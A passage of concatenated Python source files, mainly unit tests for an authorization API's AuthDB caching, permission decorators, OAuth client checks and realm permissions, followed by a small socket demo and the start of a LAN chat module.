api.reset_local_state()
def set_time(self, ts):
"""Mocks time.time() to return |ts|."""
self.mock(api.time, 'time', lambda: ts)
def set_fetched_auth_db(self, auth_db):
"""Mocks fetch_auth_db to return |auth_db|."""
def mock_fetch_auth_db(known_auth_db=None):
if (known_auth_db is not None and
auth_db.auth_db_rev == known_auth_db.auth_db_rev):
return known_auth_db
return auth_db
self.mock(api, 'fetch_auth_db', mock_fetch_auth_db)
def test_get_request_cache_different_threads(self):
"""Ensure get_request_cache() respects multiple threads."""
# Runs in its own thread.
def thread_proc():
request_cache = api.reinitialize_request_cache()
self.assertTrue(request_cache)
# Returns same object in a context of a same request thread.
self.assertTrue(api.get_request_cache() is request_cache)
return request_cache
# Launch two threads running 'thread_proc', wait for them to stop, collect
# whatever they return.
results_queue = queue.Queue()
threads = [
threading.Thread(target=lambda: results_queue.put(thread_proc()))
for _ in range(2)
]
for t in threads:
t.start()
results = [results_queue.get(timeout=1) for _ in range(len(threads))]
# Different threads use different RequestCache objects.
self.assertTrue(results[0] is not results[1])
def test_get_request_cache_different_requests(self):
"""Ensure get_request_cache() returns new object for a new request."""
# Grab request cache for 'current' request.
request_cache = api.reinitialize_request_cache()
# Track calls to 'close'.
close_calls = []
self.mock(request_cache, 'close', lambda: close_calls.append(1))
# Should return a new instance of request cache now.
self.assertTrue(api.reinitialize_request_cache() is not request_cache)
# Old one should have been closed.
self.assertEqual(1, len(close_calls))
def test_get_process_auth_db_expiration(self):
"""Ensure get_process_auth_db() respects expiration."""
# Prepare several instances of AuthDB to be used in mocks.
auth_db_v0 = new_auth_db(replication_state=mock_replication_state(0))
auth_db_v1 = new_auth_db(replication_state=mock_replication_state(1))
# Fetch initial copy of AuthDB.
self.set_time(0)
self.set_fetched_auth_db(auth_db_v0)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# It doesn't expire for some time.
self.set_time(api.get_process_cache_expiration_sec() - 1)
self.set_fetched_auth_db(auth_db_v1)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# But eventually it does.
self.set_time(api.get_process_cache_expiration_sec() + 1)
self.set_fetched_auth_db(auth_db_v1)
self.assertEqual(auth_db_v1, api.get_process_auth_db())
def test_get_process_auth_db_known_version(self):
"""Ensure get_process_auth_db() respects entity group version."""
# Prepare several instances of AuthDB to be used in mocks.
auth_db_v0 = new_auth_db(replication_state=mock_replication_state(0))
auth_db_v0_again = new_auth_db(replication_state=mock_replication_state(0))
# Fetch initial copy of AuthDB.
self.set_time(0)
self.set_fetched_auth_db(auth_db_v0)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# Make cache expire, but setup fetch_auth_db to return a new instance of
# AuthDB, but with same entity group version. Old known instance of AuthDB
# should be reused.
self.set_time(api.get_process_cache_expiration_sec() + 1)
self.set_fetched_auth_db(auth_db_v0_again)
self.assertTrue(api.get_process_auth_db() is auth_db_v0)
def test_get_process_auth_db_multithreading(self):
"""Ensure get_process_auth_db() plays nice with multiple threads."""
def run_in_thread(func):
"""Runs |func| in a parallel thread, returns future (as Queue)."""
result = queue.Queue()
thread = threading.Thread(target=lambda: result.put(func()))
thread.start()
return result
# Prepare several instances of AuthDB to be used in mocks.
auth_db_v0 = new_auth_db(replication_state=mock_replication_state(0))
auth_db_v1 = new_auth_db(replication_state=mock_replication_state(1))
# Run initial fetch, should cache |auth_db_v0| in process cache.
self.set_time(0)
self.set_fetched_auth_db(auth_db_v0)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# Make process cache expire.
self.set_time(api.get_process_cache_expiration_sec() + 1)
# Start fetching AuthDB from another thread, at some point it will call
# 'fetch_auth_db', and we pause the thread then and resume main thread.
fetching_now = threading.Event()
auth_db_queue = queue.Queue()
def mock_fetch_auth_db(**_kwargs):
fetching_now.set()
return auth_db_queue.get()
self.mock(api, 'fetch_auth_db', mock_fetch_auth_db)
future = run_in_thread(api.get_process_auth_db)
# Wait for internal thread to call |fetch_auth_db|.
fetching_now.wait()
# Ok, now main thread is unblocked, while internal thread is blocking on a
# artificially slow 'fetch_auth_db' call. Main thread can now try to get
# AuthDB via get_process_auth_db(). It should get older stale copy right
# away.
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# Finish background 'fetch_auth_db' call by returning 'auth_db_v1'.
# That's what internal thread should get as result of 'get_process_auth_db'.
auth_db_queue.put(auth_db_v1)
self.assertEqual(auth_db_v1, future.get())
# Now main thread should get it as well.
self.assertEqual(auth_db_v1, api.get_process_auth_db())
def test_get_process_auth_db_exceptions(self):
"""Ensure get_process_auth_db() handles DB exceptions well."""
# Prepare several instances of AuthDB to be used in mocks.
auth_db_v0 = new_auth_db(replication_state=mock_replication_state(0))
auth_db_v1 = new_auth_db(replication_state=mock_replication_state(1))
# Fetch initial copy of AuthDB.
self.set_time(0)
self.set_fetched_auth_db(auth_db_v0)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# Make process cache expire.
self.set_time(api.get_process_cache_expiration_sec() + 1)
# Emulate an exception in fetch_auth_db.
def mock_fetch_auth_db(*_kwargs):
raise Exception('Boom!')
self.mock(api, 'fetch_auth_db', mock_fetch_auth_db)
# Capture calls to logging.exception.
logger_calls = []
self.mock(api.logging, 'exception', lambda *_args: logger_calls.append(1))
# Should return older copy of auth_db_v0 and log the exception.
self.assertEqual(auth_db_v0, api.get_process_auth_db())
self.assertEqual(1, len(logger_calls))
# Make fetch_auth_db to work again. Verify get_process_auth_db() works too.
self.set_fetched_auth_db(auth_db_v1)
self.assertEqual(auth_db_v1, api.get_process_auth_db())
def test_get_latest_auth_db(self):
"""Ensure get_latest_auth_db "rushes" cached AuthDB update."""
auth_db_v0 = new_auth_db(replication_state=mock_replication_state(0))
auth_db_v1 = new_auth_db(replication_state=mock_replication_state(1))
# Fetch initial copy of AuthDB.
self.set_time(0)
self.set_fetched_auth_db(auth_db_v0)
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# Rig up fetch_auth_db to return a newer version.
self.set_fetched_auth_db(auth_db_v1)
# 'get_process_auth_db' still returns the cached one.
self.assertEqual(auth_db_v0, api.get_process_auth_db())
# But 'get_latest_auth_db' returns a new one and updates the cached copy.
self.assertEqual(auth_db_v1, api.get_latest_auth_db())
self.assertEqual(auth_db_v1, api.get_process_auth_db())
def test_get_request_auth_db(self):
"""Ensure get_request_auth_db() caches AuthDB in request cache."""
api.reinitialize_request_cache()
# 'get_request_auth_db()' returns whatever get_process_auth_db() returns
# when called for a first time.
self.mock(api, 'get_process_auth_db', lambda: 'fake')
self.assertEqual('fake', api.get_request_auth_db())
# But then it caches it locally and reuses local copy, instead of calling
# 'get_process_auth_db()' all the time.
self.mock(api, 'get_process_auth_db', lambda: 'another-fake')
self.assertEqual('fake', api.get_request_auth_db())
def test_warmup(self):
"""Ensure api.warmup() fetches AuthDB into process-global cache."""
self.assertFalse(api._auth_db)
api.warmup()
self.assertTrue(api._auth_db)
class ApiTest(test_case.TestCase):
"""Test for publicly exported API."""
def setUp(self):
super(ApiTest, self).setUp()
api.reset_local_state()
def test_get_current_identity_unitialized(self):
"""If request cache is not initialized, returns Anonymous."""
self.assertEqual(api.get_current_identity(), model.Anonymous)
def test_get_current_identity(self):
"""Ensure get_current_identity returns whatever was put in request cache."""
ident = model.Identity.from_bytes('user:abc@example.com')
api.get_request_cache().current_identity = ident
self.assertEqual(ident, api.get_current_identity())
def test_require_decorator_ok(self):
"""@require calls the callback and then decorated function."""
callback_calls = []
def require_callback():
callback_calls.append(1)
return True
@api.require(require_callback)
def allowed(*args, **kwargs):
return (args, kwargs)
self.assertEqual(((1, 2), {'a': 3}), allowed(1, 2, a=3))
self.assertEqual(1, len(callback_calls))
def test_require_decorator_fail(self):
"""@require raises exception and doesn't call decorated function."""
forbidden_calls = []
@api.require(lambda: False)
def forbidden():
forbidden_calls.append(1)
with self.assertRaises(api.AuthorizationError):
forbidden()
self.assertFalse(forbidden_calls)
def test_require_decorator_error_msg(self):
@api.require(lambda: False, 'Forbidden!')
def forbidden():
pass
with self.assertRaisesRegexp(api.AuthorizationError, 'Forbidden!'):
forbidden()
def test_require_decorator_nesting_ok(self):
"""Permission checks are called in order."""
calls = []
def check(name):
calls.append(name)
return True
@api.require(lambda: check('A'))
@api.require(lambda: check('B'))
def allowed(arg):
return arg
self.assertEqual('value', allowed('value'))
self.assertEqual(['A', 'B'], calls)
def test_require_decorator_nesting_first_deny(self):
"""First deny raises AuthorizationError."""
calls = []
def check(name, result):
calls.append(name)
return result
forbidden_calls = []
@api.require(lambda: check('A', False))
@api.require(lambda: check('B', True))
def forbidden(arg):
forbidden_calls.append(1)
with self.assertRaises(api.AuthorizationError):
forbidden('value')
self.assertFalse(forbidden_calls)
self.assertEqual(['A'], calls)
def test_require_decorator_nesting_non_first_deny(self):
"""Non-first deny also raises AuthorizationError."""
calls = []
def check(name, result):
calls.append(name)
return result
forbidden_calls = []
@api.require(lambda: check('A', True))
@api.require(lambda: check('B', False))
def forbidden(arg):
forbidden_calls.append(1)
with self.assertRaises(api.AuthorizationError):
forbidden('value')
self.assertFalse(forbidden_calls)
self.assertEqual(['A', 'B'], calls)
def test_require_decorator_on_method(self):
calls = []
def checker():
calls.append(1)
return True
class Class(object):
@api.require(checker)
def method(self, *args, **kwargs):
return (self, args, kwargs)
obj = Class()
self.assertEqual((obj, ('value',), {'a': 2}), obj.method('value', a=2))
self.assertEqual(1, len(calls))
def test_require_decorator_on_static_method(self):
calls = []
def checker():
calls.append(1)
return True
class Class(object):
@staticmethod
@api.require(checker)
def static_method(*args, **kwargs):
return (args, kwargs)
self.assertEqual((('value',), {'a': 2}), Class.static_method('value', a=2))
self.assertEqual(1, len(calls))
def test_require_decorator_on_class_method(self):
calls = []
def checker():
calls.append(1)
return True
class Class(object):
@classmethod
@api.require(checker)
def class_method(cls, *args, **kwargs):
return (cls, args, kwargs)
self.assertEqual(
(Class, ('value',), {'a': 2}), Class.class_method('value', a=2))
self.assertEqual(1, len(calls))
def test_require_decorator_ndb_nesting_require_first(self):
calls = []
def checker():
calls.append(1)
return True
@api.require(checker)
@ndb.non_transactional
def func(*args, **kwargs):
return (args, kwargs)
self.assertEqual((('value',), {'a': 2}), func('value', a=2))
self.assertEqual(1, len(calls))
def test_require_decorator_ndb_nesting_require_last(self):
calls = []
def checker():
calls.append(1)
return True
@ndb.non_transactional
@api.require(checker)
def func(*args, **kwargs):
return (args, kwargs)
self.assertEqual((('value',), {'a': 2}), func('value', a=2))
self.assertEqual(1, len(calls))
def test_public_then_require_fails(self):
with self.assertRaises(TypeError):
@api.public
@api.require(lambda: True)
def func():
pass
def test_require_then_public_fails(self):
with self.assertRaises(TypeError):
@api.require(lambda: True)
@api.public
def func():
pass
def test_is_decorated(self):
self.assertTrue(api.is_decorated(api.public(lambda: None)))
self.assertTrue(
api.is_decorated(api.require(lambda: True)(lambda: None)))
@mock.patch('logging.info')
def test_require_log_identity(self, logfunc):
ident = model.Identity.from_bytes('user:abc@example.com')
api.get_request_cache().current_identity = ident
@api.require(lambda: True, log_identity=True)
def func():
pass
func()
logfunc.assert_called_once_with('Accessed from user:abc@example.com')
class OAuthAccountsTest(test_case.TestCase):
"""Test for extract_oauth_caller_identity function."""
def mock_all(self, user_email, client_id, allowed_client_ids=()):
class FakeUser(object):
email = lambda _: user_email
class FakeAuthDB(object):
is_allowed_oauth_client_id = lambda _, cid: cid in allowed_client_ids
self.mock(api.oauth, 'get_current_user', lambda _: FakeUser())
self.mock(api.oauth, 'get_client_id', lambda _: client_id)
self.mock(api, 'get_request_auth_db', FakeAuthDB)
@staticmethod
def user(email):
return model.Identity(model.IDENTITY_USER, email)
def test_is_allowed_oauth_client_id_ok(self):
self.mock_all('email@email.com', 'some-client-id', ['some-client-id'])
self.assertEqual(
(self.user('email@email.com'), api.new_auth_details()),
api.extract_oauth_caller_identity())
def test_is_allowed_oauth_client_id_not_ok(self):
self.mock_all('email@email.com', 'some-client-id', ['another-client-id'])
with self.assertRaises(api.AuthorizationError):
api.extract_oauth_caller_identity()
def test_is_allowed_oauth_client_id_not_ok_empty(self):
self.mock_all('email@email.com', 'some-client-id')
with self.assertRaises(api.AuthorizationError):
api.extract_oauth_caller_identity()
class AuthWebUIConfigTest(test_case.TestCase):
def test_works(self):
utils.clear_cache(api.get_web_client_id)
self.assertEqual('', api.get_web_client_id_uncached())
api.set_web_client_id('zzz')
self.assertEqual('zzz', api.get_web_client_id_uncached())
self.assertEqual('zzz', api.get_web_client_id())
class AuthDBBuilder(object):
def __init__(self):
self.groups = []
def group(self, name, members=None, globs=None, nested=None, owners=None):
self.groups.append(model.AuthGroup(
key=model.group_key(name),
members=[model.Identity.from_bytes(m) for m in (members or [])],
globs=[model.IdentityGlob.from_bytes(g) for g in (globs or [])],
nested=nested or [],
owners=owners or 'default-owners-group',
))
return self
def build(self):
return new_auth_db(groups=self.groups)
class RelevantSubgraphTest(test_case.TestCase):
def call(self, db, principal):
if '*' in principal:
principal = model.IdentityGlob.from_bytes(principal)
elif '@' in principal:
principal = model.Identity.from_bytes(principal)
graph = db.get_relevant_subgraph(principal)
# Use a dict with integer keys instead of a list to improve the readability
# of assertions below.
nodes = {}
for i, (node, edges) in enumerate(graph.describe()):
if isinstance(node, (model.Identity, model.IdentityGlob)):
node = node.to_bytes()
nodes[i] = (node, {l: sorted(s) for l, s in edges.items() if s})
return nodes
def test_empty(self):
db = AuthDBBuilder().build()
self.assertEqual(
{0: ('user:a@example.com', {})}, self.call(db, 'user:a@example.com'))
self.assertEqual(
{0: ('user:*@example.com', {})}, self.call(db, 'user:*@example.com'))
# In the case of a nonexistent group, a empty graph is returned.
self.assertEqual({}, self.call(db, 'group'))
def test_identity_discoverable_directly_and_through_glob(self):
b = AuthDBBuilder()
b.group('g1', ['user:a@example.com'])
b.group('g2', ['user:b@example.com'])
b.group('g3', [], ['user:*@example.com'])
b.group('g4', ['user:a@example.com'], ['user:*'])
self.assertEqual({
0: ('user:a@example.com', {'IN': [1, 3, 4, 5]}),
1: ('user:*@example.com', {'IN': [2]}),
2: ('g3', {}),
3: ('user:*', {'IN': [4]}),
4: ('g4', {}),
5: ('g1', {}),
}, self.call(b.build(), 'user:a@example.com'))
def test_glob_is_matched_directly(self):
b = AuthDBBuilder()
b.group('g1', [], ['user:*@example.com'])
b.group('g2', [], ['user:*'])
self.assertEqual({
0: ('user:*@example.com', {'IN': [1]}),
1: ('g1', {}),
}, self.call(b.build(), 'user:*@example.com'))
def test_simple_group_lookup(self):
b = AuthDBBuilder()
b.group('g1', nested=['g2', 'g3'])
b.group('g2', nested=['g3'])
b.group('g3')
self.assertEqual({
0: ('g3', {'IN': [1, 2]}),
1: ('g1', {}),
2: ('g2', {'IN': [1]}),
}, self.call(b.build(), 'g3'))
def test_ownership_relations(self):
b = AuthDBBuilder()
b.group('a-root', nested=['b-inner'])
b.group('b-inner')
b.group('c-owned-by-root', owners='a-root')
b.group('d-includes-owned-by-root', nested=['c-owned-by-root'])
b.group('e-owned-by-3', owners='d-includes-owned-by-root')
self.assertEqual({
0: ('b-inner', {'IN': [1]}),
1: ('a-root', {'OWNS': [2]}),
2: ('c-owned-by-root', {'IN': [3]}),
3: ('d-includes-owned-by-root', {'OWNS': [4]}),
4: ('e-owned-by-3', {}),
}, self.call(b.build(), 'b-inner'))
def test_diamond(self):
b = AuthDBBuilder()
b.group('top', nested=['middle1', 'middle2'])
b.group('middle1', nested=['bottom'])
b.group('middle2', nested=['bottom'])
b.group('bottom')
self.assertEqual({
0: ('bottom', {'IN': [1, 3]}),
1: ('middle1', {'IN': [2]}),
2: ('top', {}),
3: ('middle2', {'IN': [2]}),
}, self.call(b.build(), 'bottom'))
def test_cycle(self):
# Note: cycles in groups are forbidden on API layer, but make sure we still
# handle them without hanging in case something unexpected happens and they
# appear.
b = AuthDBBuilder()
b.group('g1', nested=['g2'])
b.group('g2', nested=['g1', 'g2'])
self.assertEqual({
0: ('g2', {'IN': [0, 1]}),
1: ('g1', {'IN': [0]}),
}, self.call(b.build(), 'g2'))
def test_selfowners(self):
b = AuthDBBuilder()
b.group('g1', nested=['g2'], owners='g1')
b.group('g2')
self.assertEqual({0: ('g1', {'OWNS': [0]})}, self.call(b.build(), 'g1'))
self.assertEqual({
0: ('g2', {'IN': [1]}),
1: ('g1', {'OWNS': [1]}),
}, self.call(b.build(), 'g2'))
def test_messy_graph(self):
b = AuthDBBuilder()
b.group('directly', ['user:a@example.com'])
b.group('via-glob', [], ['user:*@example.com'])
b.group('g1', nested=['via-glob'], owners='g2')
b.group('g2', nested=['directly'])
b.group('g3', nested=['g1'])
self.assertEqual({
0: ('user:a@example.com', {'IN': [1, 5]}),
1: ('user:*@example.com', {'IN': [2]}),
2: ('via-glob', {'IN': [3]}),
3: ('g1', {'IN': [4]}),
4: ('g3', {}),
5: ('directly', {'IN': [6]}),
6: ('g2', {'OWNS': [3]}),
}, self.call(b.build(), 'user:a@example.com'))
class PermissionsTest(test_case.TestCase):
def test_happy_path(self):
p1 = api.Permission('service.subject.verb')
p2 = api.Permission('service.subject.verb')
p3 = api.Permission('service.subject.another')
self.assertEqual(p1, p2)
self.assertTrue(p1 is p2)
self.assertNotEqual(p1, p3)
self.assertEqual('service.subject.verb', str(p1))
self.assertEqual("'service.subject.verb'", '%r' % (p1,))
def test_validation_errors(self):
with self.assertRaises(TypeError):
api.Permission(123)
with self.assertRaises(TypeError):
api.Permission(u'no.unicode.here')
with self.assertRaises(ValueError):
api.Permission('too.few')
with self.assertRaises(ValueError):
api.Permission('too.too.too.much')
with self.assertRaises(ValueError):
api.Permission('has..empty')
class RealmStringsTest(test_case.TestCase):
def test_happy_path(self):
self.assertEqual(api.root_realm('proj'), 'proj:@root')
self.assertEqual(api.root_realm(u'proj'), 'proj:@root')
self.assertEqual(api.legacy_realm('proj'), 'proj:@legacy')
self.assertEqual(api.legacy_realm(u'proj'), 'proj:@legacy')
def test_validation_errors(self):
with self.assertRaises(TypeError):
api.root_realm(None)
with self.assertRaises(TypeError):
api.legacy_realm(None)
with self.assertRaises(ValueError):
api.root_realm('')
with self.assertRaises(ValueError):
api.legacy_realm('')
def test_validate_realm_name(self):
self.assertIsNone(api.validate_realm_name('proj:realm'))
self.assertIsNone(api.validate_realm_name('proj:@root'))
self.assertIsNone(api.validate_realm_name('proj:@legacy'))
self.assertIsNone(api.validate_realm_name('@internal:realm'))
self.assertIsNone(api.validate_realm_name('@internal:@root'))
self.assertIsNone(api.validate_realm_name('@internal:@legacy'))
def test_validate_realm_name_errors(self):
with self.assertRaises(ValueError):
self.assertFalse(api.validate_realm_name('realm'))
with self.assertRaises(ValueError):
self.assertFalse(api.validate_realm_name('proj:@invalid'))
with self.assertRaises(ValueError):
self.assertFalse(api.validate_realm_name('proj:re:alm'))
with self.assertRaises(ValueError):
self.assertFalse(api.validate_realm_name('@proj:realm'))
PERM0 = api.Permission('luci.dev.testing0')
PERM1 = api.Permission('luci.dev.testing1')
PERM2 = api.Permission('luci.dev.testing2')
ALL_PERMS = [PERM0, PERM1, PERM2]
ID1 = model.Identity.from_bytes('user:1@example.com')
ID2 = model.Identity.from_bytes('user:2@example.com')
ID3 = model.Identity.from_bytes('user:3@example.com')
ADMIN = model.Identity.from_bytes('user:admin@example.com')
class RealmsTest(test_case.TestCase):
@staticmethod
def auth_db(realms_map, groups=None, conditions=None, api_version=None):
return api.AuthDB.from_proto(
replication_state=model.AuthReplicationState(),
auth_db=replication_pb2.AuthDB(
groups=[
{
'name': name,
'members': [m.to_bytes() for m in members],
'created_by': 'user:zzz@example.com',
'modified_by': 'user:zzz@example.com',
} for name, members in (groups or {}).items()
],
realms={
'api_version': api_version or realms.API_VERSION,
'conditions': conditions or [],
'permissions': [
{'name': p.name} for p in ALL_PERMS
],
'realms': [
{
'name': name,
'bindings': [
{
'conditions': conds,
'permissions': [
ALL_PERMS.index(p)
for p in perms
],
'principals': [
p if isinstance(p, str) else p.to_bytes()
for p in principals
],
} for conds, perms, principals in sorted(bindings)
],
'data': {
'enforce_in_service': ['data for %s' % name],
},
} for name, bindings in sorted(realms_map.items())
],
},
),
additional_client_ids=[])
def setUp(self):
super(RealmsTest, self).setUp()
self.all_perms = {p.name: p for p in ALL_PERMS}
self.mock(api, '_all_perms', self.all_perms)
self.logs = {}
for lvl in ('info', 'warning', 'error', 'exception'):
self.logs[lvl] = []
def appender(lvl): # need to capture lvl in a separate closure
return lambda msg, *args: self.logs[lvl].append(msg % args)
self.mock(api.logging, lvl, appender(lvl))
def assert_logs_empty(self, lvl):
self.assertEqual([], self.logs[lvl])
def assert_logs(self, lvl, msg):
self.assertTrue(
any(msg in m for m in self.logs[lvl]),
'%r not in %r' % (msg, self.logs[lvl]))
def assert_check(self, db, perm, realms, ident, attrs, outcome):
self.assertEqual(
outcome, db.has_permission(perm, realms, ident, attributes=attrs),
'has_permission(%r, %r, %r, %r) is %s, but should be %s' %
(perm, realms, ident.to_bytes(), attrs, not outcome, outcome))
def test_direct_inclusion_in_binding(self):
db = self.auth_db({
'proj:@root': [],
'proj:realm': [
([], [PERM0, PERM1], [ID1]),
([], [PERM0, PERM2], [ID2]),
],
'proj:another/realm': [
([], [PERM2], [ID1, ID3]),
],
})
self.assert_check(db, PERM0, ['proj:realm'], ID1, None, True)
self.assert_check(db, PERM1, ['proj:realm'], ID1, None, True)
self.assert_check(db, PERM2, ['proj:realm'], ID1, None, False)
self.assert_check(db, PERM0, ['proj:realm'], ID2, None, True)
self.assert_check(db, PERM1, ['proj:realm'], ID2, None, False)
self.assert_check(db, PERM2, ['proj:realm'], ID2, None, True)
self.assert_check(
db, PERM2, ['proj:realm', 'proj:another/realm'], ID1, None, True)
self.assert_check(
db, PERM2, ['proj:realm', 'proj:another/realm'], ID3, None, True)
def test_inclusion_through_group(self):
db = self.auth_db({
'proj:@root': [],
'proj:realm': [
([], [PERM0, PERM1], ['group:empty', 'group:g1']),
([], [PERM0, PERM2], ['group:empty', 'group:g2']),
],
}, groups={'empty': [], 'g1': [ID1], 'g2': [ID2]})
self.assert_check(db, PERM0, ['proj:realm'], ID1, None, True)
self.assert_check(db, PERM1, ['proj:realm'], ID1, None, True)
self.assert_check(db, PERM2, ['proj:realm'], ID1, None, False)
self.assert_check(db, PERM0, ['proj:realm'], ID2, None, True)
self.assert_check(db, PERM1, ['proj:realm'], ID2, None, False)
self.assert_check(db, PERM2, ['proj:realm'], ID2, None, True)
def test_conditional_bindings(self):
conditions = [
{'restrict': {'attribute': 'a1', 'values': ['a', 'b']}}, # 0
{'restrict': {'attribute': 'a2', 'values': ['c']}}, # 1
{'restrict': {'attribute': 'a3', 'values': []}}, # 2
{'restrict': {'attribute': 'a1', 'values': ['c']}}, # 3
]
db = self.auth_db({
'p:r': [
([0], [PERM0], [ID1]),
([0, 1], [PERM1], [ID1]),
([0, 2], [PERM2], [ID1]),
([0], [PERM0], [ID2]),
([3], [PERM0], [ID2]),
],
}, conditions=conditions)
# "Restrict" condition works.
self.assert_check(db, PERM0, ['p:r'], ID1, {'a1': 'a'}, True)
self.assert_check(db, PERM0, ['p:r'], ID1, {'a1': 'b'}, True)
self.assert_check(db, PERM0, ['p:r'], ID1, {'a1': 'c'}, False)
self.assert_check(db, PERM0, ['p:r'], ID1, {'xx': 'a'}, False)
self.assert_check(db, PERM0, ['p:r'], ID1, None, False)
# ANDing conditions works.
self.assert_check(db, PERM1, ['p:r'], ID1, {'a1': 'a', 'a2': 'c'}, True)
self.assert_check(db, PERM1, ['p:r'], ID1, {'a1': 'a'}, False)
self.assert_check(db, PERM1, ['p:r'], ID1, {'a2': 'c'}, False)
# Empty restriction is allowed and evaluates to False.
self.assert_check(db, PERM2, ['p:r'], ID1, {'a1': 'a', 'a3': 'c'}, False)
self.assert_check(db, PERM2, ['p:r'], ID1, {'a1': 'a'}, False)
# ORing conditions via multiple bindings.
self.assert_check(db, PERM0, ['p:r'], ID2, {'a1': 'a'}, True) # via 0
self.assert_check(db, PERM0, ['p:r'], ID2, {'a1': 'b'}, True) # via 0
self.assert_check(db, PERM0, ['p:r'], ID2, {'a1': 'c'}, True) # via 3
self.assert_check(db, PERM0, ['p:r'], ID2, {'a1': 'x'}, False)
self.assert_check(db, PERM0, ['p:r'], ID2, None, False)
def test_fallback_to_root(self):
db = self.auth_db({'proj:@root': [([], [PERM0], [ID1])]})
self.assert_check(db, PERM0, ['proj:@root'], ID1, None, True)
self.assert_check(db, PERM0, ['proj:@root'], ID2, None, False)
self.assert_logs_empty('warning')
self.assert_check(db, PERM0, ['proj:realm'], ID1, None, True)
self.assert_logs('warning', 'falling back to the root')
self.assert_check(db, PERM0, ['proj:realm'], ID2, None, False)
self.assert_check(db, PERM0, ['proj:another/realm'], ID1, None, True)
def test_missing_project(self):
db = self.auth_db({})
self.assert_check(db, PERM0, ['proj:@root'], ID1, None, False)
self.assert_logs('warning', 'a non-existing root realm')
self.logs['warning'] = []
self.assert_check(db, PERM0, ['proj:@legacy'], ID1, None, False)
self.assert_logs('warning', 'doesn\'t have a root realm')
self.logs['warning'] = []
self.assert_check(db, PERM0, ['proj:another/realm'], ID1, None, False)
self.assert_logs('warning', 'doesn\'t have a root realm')
self.logs['warning'] = []
def test_unknown_permission(self):
unknown = api.Permission('luci.dev.unknown')
self.all_perms[unknown.name] = unknown
db = self.auth_db({'proj:realm': [([], [PERM0], [ID1])]})
self.assert_logs('warning', 'is not in the AuthDB')
self.assert_check(db, unknown, ['proj:realm'], ID1, None, False)
self.assert_logs('warning', 'not present in the AuthDB')
def test_realms_unavailable(self):
empty = new_auth_db()
with self.assertRaises(api.RealmsError):
empty.has_permission('luci.dev.p1', ['proj:realm'], ID1)
def test_bad_api_version(self):
with self.assertRaises(api.RealmsError):
self.auth_db({}, api_version=666)
def test_bad_permission_type(self):
db = self.auth_db({})
with self.assertRaises(TypeError):
db.has_permission('luci.dev.p1', ['proj:realm'], ID1)
def test_bad_realm_names(self):
db = self.auth_db({})
for r in ['z', ':z', 'p:', 'blah blah:z', 'p:BLAH', 'p:@z', 'p:p:z']:
with self.assertRaises(ValueError):
db.has_permission(PERM0, [r], ID1)
def test_has_permission_dryrun(self):
rc = api.RequestCache()
rc._auth_db = self.auth_db(
{'proj:@root': [([], [PERM0], [ID1])]}, groups={'admin': [ADMIN]})
self.mock(api, 'get_request_cache', lambda: rc)
# Match.
self.logs['info'] = []
api.has_permission_dryrun(
PERM0, ['proj:@root'], True, ID1,
admin_group='admin', tracking_bug='bug')
self.assert_logs('info',
"bug: has_permission_dryrun('luci.dev.testing0', ['proj:@root'], "
"'user:1@example.com'), authdb=0: match - ALLOW")
self.logs['info'] = []
api.has_permission_dryrun(
PERM1, ['proj:@root'], False, ID1,
admin_group='admin', tracking_bug='bug')
self.assert_logs('info',
"bug: has_permission_dryrun('luci.dev.testing1', ['proj:@root'], "
"'user:1@example.com'), authdb=0: match - DENY")
# Mismatch.
self.logs['warning'] = []
api.has_permission_dryrun(
PERM0, ['proj:@root'], False, ID1,
admin_group='admin', tracking_bug='bug')
self.assert_logs('warning',
"bug: has_permission_dryrun('luci.dev.testing0', ['proj:@root'], "
"'user:1@example.com'), authdb=0: mismatch - got ALLOW, want DENY")
self.logs['warning'] = []
api.has_permission_dryrun(
PERM1, ['proj:@root'], True, ID1,
admin_group='admin', tracking_bug='bug')
self.assert_logs('warning',
"bug: has_permission_dryrun('luci.dev.testing1', ['proj:@root'], "
"'user:1@example.com'), authdb=0: mismatch - got DENY, want ALLOW")
# Admin match.
self.logs['info'] = []
api.has_permission_dryrun(
PERM0, ['proj:@root'], True, ADMIN,
admin_group='admin', tracking_bug='bug')
self.assert_logs('info',
"bug: has_permission_dryrun('luci.dev.testing0', ['proj:@root'], "
"'user:admin@example.com'), authdb=0: match - ADMIN_ALLOW")
# Blow up.
self.logs['exception'] = []
api.has_permission_dryrun(
PERM1, ['@root'], True, ID1,
admin_group='admin', tracking_bug='bug')
self.assert_logs('exception',
"bug: has_permission_dryrun('luci.dev.testing1', ['@root'], "
"'user:1@example.com'), authdb=0: exception ValueError, want ALLOW")
def test_realm_data(self):
db = self.auth_db({'proj:@root': [], 'proj:r': []})
def realm_data(realm):
r = db.get_realm_data(realm)
return r.enforce_in_service[0] if r else None
self.assertEqual('data for proj:r', realm_data('proj:r'))
self.assertEqual('data for proj:@root', realm_data('proj:@root'))
self.assertEqual('data for proj:@root', realm_data('proj:zzz'))
self.assertEqual(None, realm_data('zzz:@root'))
if __name__ == '__main__':
if '-v' in sys.argv:
unittest.TestCase.maxDiff = None
unittest.main()
|
socket-preview-progs.py
|
"""
same socket, but talk between independent programs too, not just threads;
server here runs in a process and serves both process and thread clients;
sockets are machine-global, much like fifos: don't require shared memory
"""
from socket_preview import server, client # both use same port number
import sys, os
from threading import Thread
mode = int(sys.argv[1])
if mode == 1: # run server in this process
server()
elif mode == 2: # run client in this process
client('client:process=%s' % os.getpid())
else: # run 5 client threads in process
for i in range(5):
Thread(target=client, args=('client:thread=%s' % i,)).start()
|
chat.py
|
import os
import time
from threading import Thread, Lock
from queue import deque
from . import utils
from . import config
def notice(txt, color=False):
"print notice"
if color:
txt = config.Col.WARNING + txt + config.Col.ENDC
print(txt)
def stats(txt, color=False):
"Print stats"
if color:
txt = config.Col.OKBLUE + txt + config.Col.ENDC
print(txt)
class Node:
def __init__(self, color=False, alert=''):
self.__client_list_lock = Lock()
self.alive = True
self.color = color
self.alert = alert
self.issue_alert = False
addr = utils.get_existing_server_addr()
if self.color:
config.prompt = config.Col.OKGREEN + config.prompt + config.Col.ENDC # lanchat prompt
if addr is None:
self.__make_server()
else:
self.__make_client()
self.name = config.client_name
def run(self):
"""Run self on provided screen"""
notice('Starting output thread', self.color)
o = Thread(target=self.__output_thread, name='output')
o.start()
self.threads.append(o)
